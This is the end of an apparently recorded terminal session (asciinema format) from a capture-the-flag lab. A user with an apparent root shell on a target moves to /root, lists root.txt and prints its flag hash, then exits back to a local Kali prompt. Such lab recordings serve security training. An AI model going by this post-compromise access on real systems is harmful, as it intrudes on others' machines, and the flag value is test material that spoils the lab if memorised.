[284.46704, "o", "i"]
[284.691658, "i", "\r"]
[284.692511, "o", "\r\n"]
[284.697891, "o", "root\r\n"]
[287.072412, "i", "c"]
[287.072519, "o", "c"]
[287.167746, "i", "d"]
[287.167856, "o", "d"]
[287.259819, "i", " "]
[287.260254, "o", " "]
[287.527882, "i", "/"]
[287.527993, "o", "/"]
[287.798069, "i", "r"]
[287.79818, "o", "r"]
[287.865316, "i", "o"]
[287.865428, "o", "o"]
[287.955761, "i", "o"]
[287.955872, "o", "o"]
[288.06793, "i", "t"]
[288.068039, "o", "t"]
[288.338142, "i", "\r"]
[288.338257, "o", "\r\n"]
[288.900777, "i", "l"]
[288.900888, "o", "l"]
[289.036635, "i", "s"]
[289.03674, "o", "s"]
[289.283729, "i", "\r"]
[289.283839, "o", "\r\n"]
[289.291361, "o", "root.txt\r\n"]
[290.004137, "i", "c"]
[290.004247, "o", "c"]
[290.139485, "i", "a"]
[290.139642, "o", "a"]
[290.319446, "i", "t"]
[290.319611, "o", "t"]
[290.476749, "i", " "]
[290.477164, "o", " "]
[290.904756, "i", "r"]
[290.904926, "o", "r"]
[291.084811, "i", "o"]
[291.084918, "o", "o"]
[291.24339, "i", "o"]
[291.243588, "o", "o"]
[291.783256, "i", "t"]
[291.783364, "o", "t"]
[291.872397, "i", "."]
[291.872509, "o", "."]
[291.984974, "i", "t"]
[291.986487, "o", "t"]
[292.211014, "i", "x"]
[292.211736, "o", "x"]
[292.48044, "i", "t"]
[292.480739, "o", "t"]
[293.043589, "i", "\r"]
[293.0437, "o", "\r\n"]
[293.053016, "o", "c3ab266a11de0294257eaef3571bdf37"]
[293.053462, "o", "\r\n"]
[295.947423, "i", "\u0003"]
[295.947592, "o", "^C"]
[295.948558, "o", "\r\n"]
[295.949364, "o", "                                                                                                                    \r\r"]
[295.949713, "o", "\u001b]0;david@kali: ~\u0007"]
[295.951635, "o", "\r\n"]
[296.038735, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mdavid㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]"]
[296.039447, "o", "\r\n"]
[296.039819, "o", "└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[296.040186, "o", "\u001b[?2004h"]
[296.826277, "i", "\u0004"]
[296.826657, "o", "\u001b[?2004l"]
[296.842846, "o", "\r\r\n"]
